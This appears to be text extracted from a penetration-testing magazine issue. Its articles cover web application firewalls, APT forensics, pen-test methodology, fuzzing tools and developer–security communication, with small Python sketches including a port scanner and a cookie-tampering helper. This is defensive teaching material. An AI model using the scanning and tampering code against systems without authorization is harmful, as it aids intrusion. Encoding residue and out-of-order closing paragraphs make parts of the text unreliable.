Web application firewalls can be considered an extension of network application firewalls. They are able to analyze HTTP and the content it conveys. The device is strongly recommended by section 6.6 of PCI-DSS.
Often used in reverse proxy mode, it allows for a break in protocol and facilitates the restructuring of areas between applications.

The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed.

The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (e.g. blocking the IP of the attacker via a dialogue protocol with network firewalls).
Traffic Filtering: The WSF (Web Services Firewall)
The WSF represents an extension of the WAF to the protocols carrying XML traffic over HTTP, such as SOAP or REST.

XML and its standards make security management easier, in the sense that the operation of the service is described by documents generated directly by the development framework (e.g. WSDL, Schemas).

Web services are vulnerable to the same attacks as web applications; they consequently need the same kind of protection. Their position in the application infrastructure, however, is much more critical: they are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures.

The WSF provides security on the message format and content, but also on the use of a service. The use or production of a web service entails a contract between the two parties on the type of use (e.g. number of messages per day, data type, etc.). The WSF will also serve to monitor this function and to ensure respect of the SLA between the two parties.
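Monitoring a messages-per-day contract of this kind amounts to counting admissions per consumer per day. A minimal sketch, with an illustrative limit and hypothetical consumer names:

```python
from collections import defaultdict

class QuotaMonitor:
    """Enforce a per-consumer daily message quota, as a WSF might when
    monitoring an SLA (the limit here is purely illustrative)."""

    def __init__(self, daily_limit=1000):
        self.daily_limit = daily_limit
        self.counts = defaultdict(int)   # (consumer, day) -> messages seen

    def admit(self, consumer, day):
        """Count one message; return False once the consumer has exceeded
        its contracted daily volume."""
        self.counts[(consumer, day)] += 1
        return self.counts[(consumer, day)] <= self.daily_limit
```

The same counter doubles as a reporting source: the recorded counts show each partner's actual use of the service against the contract.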
Authentication, Authorization
Applications use identities to control access to various resources and functions.

The association of the identity context and security increases efficiency in the detection of anomalies. For example, a whitelist adapted according to the type of user can verify access to information based on the user's role.
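A role-adapted whitelist of this kind can be as simple as a per-role set of permitted paths. The roles and paths below are hypothetical examples:

```python
# Illustrative mapping from user role to the resources that role may touch.
ROLE_WHITELIST = {
    "customer": {"/account", "/orders"},
    "admin":    {"/account", "/orders", "/admin/users", "/admin/config"},
}

def access_is_normal(role, path):
    """Flag as anomalous any access outside the whitelist for the user's
    role, e.g. a customer requesting an admin page."""
    return path in ROLE_WHITELIST.get(role, set())
```

A customer account suddenly requesting "/admin/users" is exactly the kind of anomaly that the identity context makes cheap to detect.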
Ensuring Continuity of Service
Application security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes.

However, some attacks based on weaknesses can be devastating in effect, perpetrated to make the application unavailable and thereby provoke losses due to activity downtime.

To retaliate, it is necessary to establish protective measures that block denial of service and automated processes, and to ensure load balancing and SSL acceleration.
Operation/Monitoring
It is important to understand the use of the application during production to monitor and detect abnormal behavior and make decisions accordingly:

• Blacklist
• Legal action
• Redirection to a honeypot
Log Correlation
Understanding abnormal behavior in an application helps in locating an attack.

An application infrastructure can comprise hundreds of applications.

To understand the attack as a whole and monitor its phases (discovery, aggression, compromise), it is necessary to have a holistic view.
To do this, it is imperative to collect and correlate logs to obtain a real-time overall analysis and understand the threat mechanics:

• Mass attack on a type of application
• Attack targeting a specific application
• Attacks focused on a type of data
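The first two of these categories can be distinguished by correlating alerts across applications. The sketch below is a simplified illustration: the alert record format, threshold and labels are assumptions, not from the article:

```python
from collections import Counter

def classify(alerts, mass_threshold=3):
    """Correlate WAF alerts from many applications per source IP and tell
    a mass attack on one application type from a targeted attack on a
    single application. alerts: list of dicts with 'src_ip', 'app' and
    'app_type' keys (an assumed log format)."""
    by_ip = {}
    for a in alerts:
        by_ip.setdefault(a["src_ip"], []).append(a)
    findings = {}
    for ip, hits in by_ip.items():
        apps = {h["app"] for h in hits}
        types = Counter(h["app_type"] for h in hits)
        if len(apps) >= mass_threshold and len(types) == 1:
            # Many distinct applications, all of one type: automated sweep.
            findings[ip] = "mass attack on type " + next(iter(types))
        elif len(apps) == 1:
            # Repeated hits on a single application: targeted attack.
            findings[ip] = "targeted attack on " + next(iter(apps))
    return findings
```

Only the correlated view reveals the difference: each individual application's log shows the same isolated probes either way.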
Reporting and Alerting
The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and the use of the application provide these teams with a basis for work and an understanding of application threats.

Alerts will enable them to react and trigger procedures, either at the network level by blocking the IP of the attacker, or at the application level by forbidding access to resource areas, or more directly by referral to a honeypot with a view to analyzing the behavior of the attacker.
Forensics
Understanding the scope of an attack: for each compromised area, it is important to understand what elements have been impacted and to trace the attack back to the roots of the intrusion and compromise – the installation of a backdoor, bounce mechanisms to other areas, and/or extraction of data.
Analysis of application components
To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable or a cookie. To drill down to this level, the logs of the various application components turn out to be very useful:

• Web server or application
• Database
• Directory
• Etc.
Systems Analysis
To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act, such as placing an executable file in the application itself, to the injection of code into a process (e.g. hooking network functions), it is necessary to analyze the system hosting the application:

• Changed configuration files
• Users added
• Security rules changed
• Errors of execution or increases in privileges
• Unknown daemons or unusual groups and users
• Etc.
Analysis of network equipment
During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leaves fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check whether there are connections to web applications at unusual times.
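The unusual-time check reduces to flagging log entries whose hour falls outside expected usage. A minimal sketch, where the business hours and the log-line format are assumptions for illustration:

```python
from datetime import datetime

BUSINESS_HOURS = range(7, 20)   # 07:00-19:59 counts as usual (assumed)

def unusual_accesses(log_lines):
    """log_lines: iterable of 'ISO-timestamp user' strings; return the
    (user, hour) pairs whose hour falls outside business hours."""
    flagged = []
    for line in log_lines:
        stamp, user = line.split(" ", 1)
        hour = datetime.fromisoformat(stamp).hour
        if hour not in BUSINESS_HOURS:
            flagged.append((user, hour))
    return flagged
```

An administrator login at 03:14 is the kind of entry this surfaces for manual review during forensics.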
The End Justifies the Means
In conclusion, we can see that the means used to achieve an APT are often substantial and proportional to the criticality of the targeted data. APTs are not just temporary attacks but real and constant threats with a latent effect that need to be fought over the long run.
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simplify security operations.
Real-life experience of application management highlights the difficulties in implementing all of these good practices.
A comprehensive study of threats, an appropriate response, and the anticipation of possible incidents are now the recommended procedure for dealing with application attacks.
MATTHIEU ESTRADE
Matthieu Estrade has 14 years of experience in internet security. In 2001, Matthieu designed a pioneering application firewall based on web reverse proxy technology for the company Axiliance. As a well known specialist in his field, he soon became a member of the open source Apache HTTP Server development team. His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, ColdFusion, and Flash.
These applications expose financial data, customer information, and other sensitive and confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses must undertake to achieve the desired security level for such applications. With such critical data accessible from the public domain, web application security testing also becomes a paramount process for all web applications exposed to the outside world.
Introduction
Penetration testing (also called pen testing) is usually conducted by ethical hackers: the security team reviews application security vulnerabilities to discover potential security risks. The process requires deep knowledge of, and experience with, a variety of different tools and a range of exploits that can achieve the required tasks.
During pen testing, different web application vulnerabilities are tested (e.g. input validation, buffer overflow, cross-site scripting, URL manipulation, SQL injection, cookie modification, bypassing authentication, and code execution). A typical pen test involves the following procedures:
• Identification of Ports – In this process, ports are scanned and the associated running services are identified.
• Software Services Analysis – In this process, both automated and manual testing is conducted to discover weaknesses.
• Verification of Vulnerabilities – This process helps verify that the vulnerabilities are real and shows where a weakness might be exploited, to help remediate the issues.
• Remediation of Vulnerabilities – In this process, the vulnerabilities are resolved and then re-tested to ensure they have been addressed.
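The first procedure, identification of ports, can be sketched with a plain TCP connect() scan. This is a simplified stand-in for real port scanners, which also probe UDP and fingerprint services; scan only hosts you are authorized to test.

```python
import socket

# Minimal TCP connect() scan illustrating the port-identification step.
# Real scanners also probe UDP and fingerprint the listening services.

def scan_ports(host: str, ports, timeout: float = 0.5) -> list:
    """Return the subset of `ports` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connected
                open_ports.append(port)
    return open_ports
```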
Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, so that the number of security-related design and coding defects can be reduced, and the severity of any defects that remain undetected can be reduced or eliminated. Although these initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence and put anomalies into context or make normative judgments about them, the struggle to find certain vulnerabilities will persist.
Web Application Security and Penetration Testing
In recent years, web applications have grown dramatically within many organizations and businesses, and such entities have become very dependent on this technology as part of their business lifecycle.
Automated Scanning vs. Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit vulnerabilities to determine whether unauthorized access or other malicious activity is possible. By performing a pen test to simulate an attack, it's possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access (i.e. port 80 and port 443). Given the complexity of web applications and the tremendous amount of sensitive data that exists within them, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application with automated systems and tools or with manual processes. The security implementation begins in the conceptual phase, where the security risks introduced by the application are modeled together with the countermeasures that need to be implemented. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:
• Automated process – where scanning tools or static analysis tools are used
• Manual process – where penetration testing or code review is used
Web application vulnerability types can be grouped into two categories:
Technical Vulnerabilities
Such vulnerabilities can be examined through tests for cross-site scripting, injection flaws, and buffer overflows. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests are. While automated testing and scanning tools may not be able
to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future either. Current problems facing web application scanning tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities
Such vulnerabilities can be used to manipulate the logic of the application into performing tasks that were never intended. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow, or how the application works in general. Understanding the logic and flow of an application allows the manual pen tester to subvert the business logic and expose security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, bypassing the security validation at point B.
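The A-to-C shortcut just described is prevented by enforcing workflow order on the server side. In the minimal sketch below, the step names and the session dictionary are assumptions for the example: each request to a step is refused unless its predecessor was actually completed in this session.

```python
# Server-side guard against skipping the validation step: each step is
# allowed only if its required predecessor has been completed.
REQUIRED_PREDECESSOR = {"B": "A", "C": "B"}  # assumed workflow A -> B -> C

def enter_step(session: dict, step: str) -> bool:
    """Allow the step only if the workflow order is respected."""
    needed = REQUIRED_PREDECESSOR.get(step)
    if needed and needed not in session.get("completed", set()):
        return False  # out-of-order request: validation was skipped
    session.setdefault("completed", set()).add(step)
    return True
```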
History has proven that software bugs, defects, and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks, and application information. It has also been proven that most security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocol). Against such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analyses review the critical components of a web-based portal, e-commerce application, or web services platform. Part of the analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database, or the web server used by the application.
It's imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon an evaluation of the integration between components (e.g. third-party components and in-house built components) and of the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application; they expose the most likely exploitable vulnerabilities
Figure 1. The different activities of the pen testing process
and allow similar instances of vulnerabilities to be found throughout the code.
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, with access to the resources under test taking place remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals, and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process. Testing processes used to achieve the security vulnerability assessment include application spidering, authentication testing, session management testing, data validation testing, web service testing, Ajax testing, business logic testing, risk assessment, and reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment; some of these approaches are:
• Zero-Knowledge Test (Black Box) – In this approach, the application security testing team has no inside information about the target environment, and the knowledge gained is based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge about the environment under test is gained before conducting the test.
• Source Code Analysis (White Box) – In this approach, the penetration test team has full information about the application and its source code. In such a test, the security team performs a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It's also important to point out that penetration testing can be conducted through two different types of testing:
• External Penetration Testing
• Internal Penetration Testing
Both types of testing can be conducted with little or no information (black box) or with full information (white box).
Figure 2. The different phases of pen testing
Figure 3 shows the different procedures and steps that can be used to conduct penetration testing. The following is a description of these steps:
• Scope and Plan – In this step, the scope of the penetration testing is identified, and the project plan and resources are defined.
• System Scan and Probe – In this step, system scanning within the defined scope of the project is conducted: automated scanners examine the open ports and scan the system to detect vulnerabilities, using the hostnames and IP addresses previously collected.
• Creation of Attack Strategies – In this step, the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. Also at this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step, the exploitation of vulnerabilities using automated tools is conducted: the attack methods designed in the previous phase are used to perform the following tests: data and service pilferage tests, buffer overflow, privilege escalation, and denial of service (if applicable).
• Documentation – In this step, all the vulnerabilities discovered during the test are documented; evidence of exploitation and the penetration testing findings should also be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and web applications.
Web Application Testing Tools
Throughout pen testing, a specific, structured methodology has to be followed, where the following steps might be used: enumeration, vulnerability assessment, and exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions, and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s), and any intermediary devices such as firewalls and load balancers. It's also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields, and HTML page sources should be part of the security assessment as well.
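Part of that manual inspection, listing the hidden form fields in a page, can itself be scripted. A small sketch using Python's standard html.parser follows; the form markup in the usage example is illustrative.

```python
from html.parser import HTMLParser

# Collects <input type="hidden"> fields from an HTML page, one of the
# items a tester inspects by hand when reviewing page sources.

class HiddenFieldFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type", "").lower() == "hidden":
            self.fields[a.get("name", "")] = a.get("value", "")

def hidden_fields(html_text: str) -> dict:
    finder = HiddenFieldFinder()
    finder.feed(html_text)
    return finder.fields
```

Hidden fields that carry prices, roles, or state are prime candidates for the tampering tests described later.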
Some of the areas that can be covered during the vulnerability assessment are the following:
• Input validation
• Access Control
Figure 3. Testing techniques, procedures, and steps
• Authentication and Session Management (Session ID flaws) Vulnerabilities
• Cross-Site Scripting (XSS) Vulnerabilities
• Buffer Overflows
• Injection Flaws
• Error Handling
• Insecure Storage
• Denial of Service (if required)
• Configuration Management
• Business Logic Flaws
• SQL Injection Faults
• Cookie Manipulation and Poisoning
• Privilege Escalation
• Command Injection
• Client-Side and Header Manipulation
• Unintended Information Disclosure
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause denial of service conditions, which are usually discussed beforehand. Possible options for denial of service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations, and comments are summarized, and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is only half done: the most important part of the assessment still has to be delivered, namely the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing.
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. A port scanning tool examines or questions each of the designated network ports or services on the target system, and most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to identify the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. Configuration flexibility in port scanners serves to examine different port configurations, as well as to hide from network intrusion detection mechanisms.
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and unpatched software, as well as for configuration problems such as user permission management defects or problems with file access controls. Although both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard, and Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxies
Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks for exercising the weaknesses of the application and its associated components. For example, penetration testers can view all cookies, hidden HTML fields, and other data used by the web application, and attempt to manipulate their values to trick the application.
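As an illustration of what an assessment proxy does, here is a minimal sketch that tampers with one cookie in an intercepted request before it is forwarded. Modeling the headers as a dict, and the cookie names themselves, are assumptions for the example; a real proxy operates on the raw HTTP stream.

```python
# Minimal model of assessment-proxy tampering: rewrite one cookie in an
# intercepted request before forwarding it to the server.

def tamper_cookie(headers: dict, name: str, new_value: str) -> dict:
    cookies = dict(pair.split("=", 1)
                   for pair in headers.get("Cookie", "").split("; ")
                   if "=" in pair)
    cookies[name] = new_value
    tampered = dict(headers)
    tampered["Cookie"] = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return tampered
```

A tester might use this to flip an assumed `role=user` cookie to `role=admin` and observe whether the application trusts the client-supplied value.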
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform these penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of its results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, to be used as a feedback and reporting feature for the test results.
• Extensibility – The tool should be customizable, and it must provide a scripting language or plug-in
capabilities that can be used to construct customized penetration tests.
• Configurability – A tool that is configurable is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide proper documentation that clearly explains the probes performed during the penetration testing.
• License Flexibility – A tool that can be used without specific constraints, such as a particular range of IP numbers or license limits, is a better tool than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookies, XML data, etc.). If web developers fail to sanitize incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting, and other attacks against the web application.
• Validate data before form submission and manage sessions – Cross-Site Request Forgery (CSRF) can occur when a web application accepts form submission data without verifying that it came from the user's web form. It is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and apply proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to protect any stored passwords.
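The first guideline, sanitizing browser-supplied data before it reaches SQL, usually comes down to parameterized queries. A minimal sketch with Python's built-in sqlite3 follows; the table and rows are illustrative.

```python
import sqlite3

# Browser-supplied data is passed to the database as a bound parameter,
# never concatenated into the SQL text. Schema and rows are illustrative.

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

def find_user(username: str):
    # The ? placeholder lets the driver handle escaping, so classic
    # payloads such as ' OR '1'='1 match nothing.
    return conn.execute(
        "SELECT id FROM users WHERE name = ?", (username,)).fetchall()
```

The same principle applies regardless of database or language: keep the query text constant and pass untrusted values only through the driver's parameter mechanism.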
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying, and ranking the vulnerabilities in a system, where such a process determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessment will, over time, continue to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools can't entirely replace manual penetration tests. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment these results with the logical vulnerabilities that automated testing cannot find.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will go from difficult to impossible as the size, scope, and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money, and effort required to assess thousands of web applications will increase the use of automated tools rather than humans manually testing these applications. Moreover, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of information technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
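A deliberately dumb random fuzzer already illustrates the principle: mutate a valid sample, feed it to the target, and record every input that triggers an abnormal reaction. The sketch below is a minimal illustration only; the target function is a stand-in, and as the rest of this piece argues, serious tools are model-based rather than random.

```python
import random

# Dumb random fuzzing: corrupt a valid sample and record the inputs
# that make the target raise. Purely illustrative.

def mutate(sample: bytes, rng: random.Random) -> bytes:
    """Corrupt a few random bytes of a valid sample."""
    data = bytearray(sample)
    for _ in range(rng.randint(1, 4)):
        data[rng.randrange(len(data))] = rng.randrange(256)
    return bytes(data)

def fuzz(target, sample: bytes, runs: int = 100, seed: int = 0) -> list:
    """Return the mutated inputs that made `target` raise an exception."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(runs):
        case = mutate(sample, rng)
        try:
            target(case)
        except Exception:
            crashes.append(case)  # a reproducible test case for developers
    return crashes
```

Each returned input is exactly the kind of documented, reproducible test case the requirements below call for.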
In this article, we will highlight the most important requirements for a fuzzing tool and also look at the most common mistakes people make with fuzzing.
Documented test cases – When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation – All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts – Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box – If the requirement for testers is merely to do fuzzing, they almost always choose the quick and dirty solution, which is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most of the flaws in the software.
Using hardware test beds – Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you where testing is needed, and are not locked to a physical test lab.
Unprepared for cloud – A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud environments.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites – Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use – Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated – Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage – Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable – Time is almost always an issue when it comes to testing, and the user must have control over fuzzing parameters such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can spend more time on testing and can select other test completion criteria.
Application Security team members are considered like the tax man asking for money: security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers for something like Give us the latest Web 2.0, social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more to meet the proposed deadline. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and in project Gantt charts there usually
are no security checkpoints included for code testing, nor time allowed for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone remembers something about security: Hey, we need to get this online, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom, for example statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before use. The report does not contain all
Developers are from Venus, Application Security guys are from Mars
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not open source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
